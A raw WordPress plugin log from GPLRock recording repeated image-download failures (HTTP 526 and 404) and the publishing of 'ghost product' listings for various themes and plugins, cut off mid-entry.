UTC] GPLRock: Image downloaded successfully for product woocommerce-variations-to-table-grid (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ceb137fd.jpg [06-Apr-2026 18:16:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-variations-to-table-grid: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ceb137fd.jpg [06-Apr-2026 18:16:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-variations-to-table-grid [06-Apr-2026 18:29:06 UTC] GPLRock: Image download failed for product hetch-windows-and-doors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:08 UTC] GPLRock: Image download failed for product hetch-windows-and-doors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hetch---windows-and-doors-wordpress-theme-1774.webp for product hetch-windows-and-doors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:10 UTC] GPLRock: Image download failed for product hetch-windows-and-doors-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:12 UTC] GPLRock: Image download failed for product hetch-windows-and-doors-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hetch---windows-and-doors-wordpress-theme-1774.webp for product hetch-windows-and-doors-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:14 UTC] GPLRock WARNING: Image download failed for product hetch-windows-and-doors-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hetch---windows-and-doors-wordpress-theme-1774.webp [06-Apr-2026 18:29:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hetch-windows-and-doors-wordpress-theme [06-Apr-2026 18:29:15 UTC] GPLRock: Image download failed for product flooring-paving-and-tiling-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:17 UTC] GPLRock: Image download failed for product flooring-paving-and-tiling-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flooring---paving-and-tiling-services-wordpress-theme-12921.webp for product flooring-paving-and-tiling-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:19 UTC] GPLRock: Image download failed for product flooring-paving-and-tiling-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:21 UTC] GPLRock: Image download failed for product flooring-paving-and-tiling-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flooring---paving-and-tiling-services-wordpress-theme-12921.webp for product flooring-paving-and-tiling-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:23 UTC] GPLRock WARNING: Image download failed for product flooring-paving-and-tiling-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/flooring---paving-and-tiling-services-wordpress-theme-12921.webp [06-Apr-2026 18:29:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flooring-paving-and-tiling-services-wordpress-theme [06-Apr-2026 18:29:23 UTC] GPLRock: Image download failed for product alphacolor-type-design-3d-printing-wordpress-theme-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:25 UTC] GPLRock: Image download failed for product alphacolor-type-design-3d-printing-wordpress-theme-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alphacolor--type-design--3d-printing-wordpress-theme--elementor-11251.webp for product alphacolor-type-design-3d-printing-wordpress-theme-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:28 UTC] GPLRock: Image download failed for product alphacolor-type-design-3d-printing-wordpress-theme-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:30 UTC] GPLRock: Image download failed for product alphacolor-type-design-3d-printing-wordpress-theme-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alphacolor--type-design--3d-printing-wordpress-theme--elementor-11251.webp for product alphacolor-type-design-3d-printing-wordpress-theme-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:32 UTC] GPLRock WARNING: Image download failed for product alphacolor-type-design-3d-printing-wordpress-theme-elementor. URL: https://meldwp.com/wp-content/uploads/alphacolor--type-design--3d-printing-wordpress-theme--elementor-11251.webp [06-Apr-2026 18:29:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alphacolor-type-design-3d-printing-wordpress-theme-elementor [06-Apr-2026 18:29:32 UTC] GPLRock: Image download failed for product solteck-software-startup-saas-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:34 UTC] GPLRock: Image download failed for product solteck-software-startup-saas-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solteck---software-startup--saas-landing-wordpress-theme-444.webp for product solteck-software-startup-saas-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:36 UTC] GPLRock: Image download failed for product solteck-software-startup-saas-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:38 UTC] GPLRock: Image download failed for product solteck-software-startup-saas-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solteck---software-startup--saas-landing-wordpress-theme-444.webp for product solteck-software-startup-saas-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:40 UTC] GPLRock WARNING: Image download failed for product solteck-software-startup-saas-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/solteck---software-startup--saas-landing-wordpress-theme-444.webp [06-Apr-2026 18:29:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: solteck-software-startup-saas-landing-wordpress-theme [06-Apr-2026 18:29:41 UTC] GPLRock: Image download failed for product corpboot-corporate-website-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:43 UTC] GPLRock: Image download failed for product corpboot-corporate-website-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corpboot---corporate-website-wordpress-theme-17136.webp for product corpboot-corporate-website-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:45 UTC] GPLRock: Image download failed for product corpboot-corporate-website-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:47 UTC] GPLRock: Image download failed for product corpboot-corporate-website-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corpboot---corporate-website-wordpress-theme-17136.webp for product corpboot-corporate-website-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:49 UTC] GPLRock WARNING: Image download failed for product corpboot-corporate-website-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/corpboot---corporate-website-wordpress-theme-17136.webp [06-Apr-2026 18:29:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corpboot-corporate-website-wordpress-theme [06-Apr-2026 18:29:49 UTC] GPLRock: Image download failed for product haptic-web-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:51 UTC] GPLRock: Image download failed for product haptic-web-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haptic---web-design-agency-wordpress-theme-25698.webp for product haptic-web-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:53 UTC] GPLRock: Image download failed for product haptic-web-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:56 UTC] GPLRock: Image download failed for product haptic-web-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:29:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/haptic---web-design-agency-wordpress-theme-25698.webp for product haptic-web-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:29:58 UTC] GPLRock WARNING: Image download failed for product haptic-web-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/haptic---web-design-agency-wordpress-theme-25698.webp [06-Apr-2026 18:29:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: haptic-web-design-agency-wordpress-theme [06-Apr-2026 18:29:58 UTC] GPLRock: Image download failed for product fierce-bold-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:00 UTC] GPLRock: Image download failed for product fierce-bold-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fierce---bold-photography-wordpress-theme-2688.webp for product fierce-bold-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:02 UTC] GPLRock: Image download failed for product fierce-bold-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:04 UTC] GPLRock: Image download failed for product fierce-bold-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fierce---bold-photography-wordpress-theme-2688.webp for product fierce-bold-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:06 UTC] GPLRock WARNING: Image download failed for product fierce-bold-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fierce---bold-photography-wordpress-theme-2688.webp [06-Apr-2026 18:30:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fierce-bold-photography-wordpress-theme [06-Apr-2026 18:30:07 UTC] GPLRock: Image download failed for product good-tailor-fashion-tailoring-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:09 UTC] GPLRock: Image download failed for product good-tailor-fashion-tailoring-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/good-tailor---fashion--tailoring-services-wordpress-theme-1976.webp for product good-tailor-fashion-tailoring-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:11 UTC] GPLRock: Image download failed for product good-tailor-fashion-tailoring-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:13 UTC] GPLRock: Image download failed for product good-tailor-fashion-tailoring-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/good-tailor---fashion--tailoring-services-wordpress-theme-1976.webp for product good-tailor-fashion-tailoring-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:15 UTC] GPLRock WARNING: Image download failed for product good-tailor-fashion-tailoring-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/good-tailor---fashion--tailoring-services-wordpress-theme-1976.webp [06-Apr-2026 18:30:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: good-tailor-fashion-tailoring-services-wordpress-theme [06-Apr-2026 18:30:15 UTC] GPLRock: Image download failed for product mondok-hotel-and-accommodations-theme-with-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:17 UTC] GPLRock: Image download failed for product mondok-hotel-and-accommodations-theme-with-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mondok--hotel-and-accommodations-theme-with-booking-30133.webp for product mondok-hotel-and-accommodations-theme-with-booking after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:20 UTC] GPLRock: Image download failed for product mondok-hotel-and-accommodations-theme-with-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:22 UTC] GPLRock: Image download failed for product mondok-hotel-and-accommodations-theme-with-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mondok--hotel-and-accommodations-theme-with-booking-30133.webp for product mondok-hotel-and-accommodations-theme-with-booking after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:24 UTC] GPLRock WARNING: Image download failed for product mondok-hotel-and-accommodations-theme-with-booking. URL: https://meldwp.com/wp-content/uploads/mondok--hotel-and-accommodations-theme-with-booking-30133.webp [06-Apr-2026 18:30:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mondok-hotel-and-accommodations-theme-with-booking [06-Apr-2026 18:30:24 UTC] GPLRock: Image download failed for product lockey-cctv-and-security-systems-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:26 UTC] GPLRock: Image download failed for product lockey-cctv-and-security-systems-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lockey---cctv-and-security-systems-wordpress-theme-9092.webp for product lockey-cctv-and-security-systems-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:28 UTC] GPLRock: Image download failed for product lockey-cctv-and-security-systems-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:31 UTC] GPLRock: Image download failed for product lockey-cctv-and-security-systems-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:30:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lockey---cctv-and-security-systems-wordpress-theme-9092.webp for product lockey-cctv-and-security-systems-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:30:33 UTC] GPLRock WARNING: Image download failed for product lockey-cctv-and-security-systems-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lockey---cctv-and-security-systems-wordpress-theme-9092.webp [06-Apr-2026 18:30:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lockey-cctv-and-security-systems-wordpress-theme [06-Apr-2026 18:32:11 UTC] GPLRock: Image downloaded successfully for product digibit-cryptocurrency-mining-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-081724f2.jpg [06-Apr-2026 18:32:11 UTC] GPLRock: Using pre-downloaded image for product digibit-cryptocurrency-mining-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-081724f2.jpg [06-Apr-2026 18:32:11 UTC] GPLRock: Ghost product published with image - Product ID: digibit-cryptocurrency-mining-wordpress-theme [06-Apr-2026 18:32:13 UTC] GPLRock: Image downloaded successfully for product rodich-a-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34d6808b.jpg [06-Apr-2026 18:32:13 UTC] GPLRock: Using pre-downloaded image for product rodich-a-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34d6808b.jpg [06-Apr-2026 18:32:13 UTC] GPLRock: Ghost product published with image - Product ID: rodich-a-restaurant-wordpress-theme [06-Apr-2026 18:32:16 UTC] GPLRock: Image download failed for product hampton-home-design-and-house-renovation-wp-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 18:32:20 UTC] GPLRock: Image download failed for product hampton-home-design-and-house-renovation-wp-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 18:32:24 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/Hampton-Home-Design-and-House-Renovation-WP-Theme.jpg for product hampton-home-design-and-house-renovation-wp-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 18:32:26 UTC] GPLRock: Image download failed for product hampton-home-design-and-house-renovation-wp-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 18:32:30 UTC] GPLRock: Image download failed for product hampton-home-design-and-house-renovation-wp-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 18:32:34 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/Hampton-Home-Design-and-House-Renovation-WP-Theme.jpg for product hampton-home-design-and-house-renovation-wp-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 18:32:34 UTC] GPLRock WARNING: Image download failed for product hampton-home-design-and-house-renovation-wp-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/11/Hampton-Home-Design-and-House-Renovation-WP-Theme.jpg [06-Apr-2026 18:32:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hampton-home-design-and-house-renovation-wp-theme [06-Apr-2026 18:32:36 UTC] GPLRock: Image downloaded successfully for product gwen-creative-personal-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea4120f1.jpg [06-Apr-2026 18:32:36 UTC] GPLRock: Using pre-downloaded image for product gwen-creative-personal-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ea4120f1.jpg [06-Apr-2026 18:32:36 UTC] GPLRock: Ghost product published with image - Product ID: gwen-creative-personal-wordpress-blog-theme [06-Apr-2026 18:32:38 UTC] GPLRock: Image downloaded successfully for product debaco-kitchen-appliances-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff3bafcd.jpg [06-Apr-2026 18:32:38 UTC] GPLRock: Using pre-downloaded image for product debaco-kitchen-appliances-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff3bafcd.jpg [06-Apr-2026 18:32:38 UTC] GPLRock: Ghost product published with image - Product ID: debaco-kitchen-appliances-for-woocommerce-wordpress [06-Apr-2026 18:32:40 UTC] GPLRock: Image downloaded successfully for product zyra-clean-minimal-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51592748.png [06-Apr-2026 18:32:40 UTC] GPLRock: Using pre-downloaded image for product zyra-clean-minimal-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51592748.png [06-Apr-2026 18:32:40 UTC] GPLRock: Ghost product published with image - Product ID: zyra-clean-minimal-woocommerce-theme [06-Apr-2026 18:32:42 UTC] GPLRock: Image downloaded successfully for product bespoke-onepage-creative-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-946f6231.jpg [06-Apr-2026 18:32:42 UTC] GPLRock: Using pre-downloaded image for product bespoke-onepage-creative-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-946f6231.jpg [06-Apr-2026 18:32:42 UTC] GPLRock: Ghost product published with image - Product ID: bespoke-onepage-creative-wordpress-theme [06-Apr-2026 18:32:44 UTC] GPLRock: Image downloaded successfully for product advance-post-grid-list-with-custom-filtering-for-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1470e482.png [06-Apr-2026 18:32:44 UTC] GPLRock: Using pre-downloaded image for product advance-post-grid-list-with-custom-filtering-for-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1470e482.png [06-Apr-2026 18:32:44 UTC] GPLRock: Ghost product published with image - Product ID: advance-post-grid-list-with-custom-filtering-for-visual-composer [06-Apr-2026 18:32:46 UTC] GPLRock: Image downloaded successfully for product crowdngo-fundraising-charity-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdfef3c4.jpg [06-Apr-2026 18:32:46 UTC] GPLRock: Using pre-downloaded image for product crowdngo-fundraising-charity-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdfef3c4.jpg [06-Apr-2026 18:32:46 UTC] GPLRock: Ghost product published with image - Product ID: crowdngo-fundraising-charity-wordpress-theme [06-Apr-2026 18:32:48 UTC] GPLRock: Image downloaded successfully for product rosalinda-health-coach-vegetarian-lifestyle-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f821ebd.png [06-Apr-2026 18:32:48 UTC] GPLRock: Using pre-downloaded image for product rosalinda-health-coach-vegetarian-lifestyle-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f821ebd.png [06-Apr-2026 18:32:48 UTC] GPLRock: Ghost product published with image - Product ID: rosalinda-health-coach-vegetarian-lifestyle-blog-wordpress-theme [06-Apr-2026 18:33:40 UTC] GPLRock: Image downloaded successfully for product quiz-and-contest-planner-for-wp-poll (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e05e18ba.webp [06-Apr-2026 18:33:40 UTC] GPLRock: Using pre-downloaded image for product quiz-and-contest-planner-for-wp-poll: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e05e18ba.webp [06-Apr-2026 18:33:40 UTC] GPLRock: Ghost product published with image - Product ID: quiz-and-contest-planner-for-wp-poll [06-Apr-2026 18:33:41 UTC] GPLRock: Image download failed for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:43 UTC] GPLRock: Image download failed for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vertical-royal-3d-coverflow-wordpress--woocommerce-plugin-12795.webp for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:33:45 UTC] GPLRock: Image download failed for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:47 UTC] GPLRock: Image download failed for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vertical-royal-3d-coverflow-wordpress--woocommerce-plugin-12795.webp for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:33:49 UTC] GPLRock WARNING: Image download failed for product vertical-royal-3d-coverflow-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/vertical-royal-3d-coverflow-wordpress--woocommerce-plugin-12795.webp [06-Apr-2026 18:33:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vertical-royal-3d-coverflow-wordpress-woocommerce-plugin [06-Apr-2026 18:33:49 UTC] GPLRock: Image download failed for product counter-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:51 UTC] GPLRock: Image download failed for product counter-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/counter-addon-for-wpbakery-page-builder-1222.webp for product counter-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:33:54 UTC] GPLRock: Image download failed for product counter-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:56 UTC] GPLRock: Image download failed for product counter-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:33:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/counter-addon-for-wpbakery-page-builder-1222.webp for product counter-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:33:58 UTC] GPLRock WARNING: Image download failed for product counter-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/counter-addon-for-wpbakery-page-builder-1222.webp [06-Apr-2026 18:33:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: counter-addon-for-wpbakery-page-builder [06-Apr-2026 18:33:58 UTC] GPLRock: Image download failed for product woocommerce-customer-history-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:00 UTC] GPLRock: Image download failed for product woocommerce-customer-history-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-history-plugin-3958.webp for product woocommerce-customer-history-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:03 UTC] GPLRock: Image download failed for product woocommerce-customer-history-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:05 UTC] GPLRock: Image download failed for product woocommerce-customer-history-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-history-plugin-3958.webp for product woocommerce-customer-history-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:07 UTC] GPLRock WARNING: Image download failed for product woocommerce-customer-history-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-customer-history-plugin-3958.webp [06-Apr-2026 18:34:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-customer-history-plugin [06-Apr-2026 18:34:07 UTC] GPLRock: Image download failed for product flancemobilewoo-woocommerce-mobile-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:09 UTC] GPLRock: Image download failed for product flancemobilewoo-woocommerce-mobile-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flancemobilewoo---woocommerce-mobile-theme-5016.webp for product flancemobilewoo-woocommerce-mobile-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:11 UTC] GPLRock: Image download failed for product flancemobilewoo-woocommerce-mobile-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:13 UTC] GPLRock: Image download failed for product flancemobilewoo-woocommerce-mobile-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flancemobilewoo---woocommerce-mobile-theme-5016.webp for product flancemobilewoo-woocommerce-mobile-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:15 UTC] GPLRock WARNING: Image download failed for product flancemobilewoo-woocommerce-mobile-theme. URL: https://meldwp.com/wp-content/uploads/flancemobilewoo---woocommerce-mobile-theme-5016.webp [06-Apr-2026 18:34:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flancemobilewoo-woocommerce-mobile-theme [06-Apr-2026 18:34:17 UTC] GPLRock: Image download failed for product avatar-author-box-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:19 UTC] GPLRock: Image download failed for product avatar-author-box-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/avatar--author-box-for-elementor-9771.webp for product avatar-author-box-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:34:22 UTC] GPLRock: Image download failed for product avatar-author-box-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:24 UTC] GPLRock: Image download failed for product avatar-author-box-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:34:26 UTC] GPLRock Error: Failed to download image from 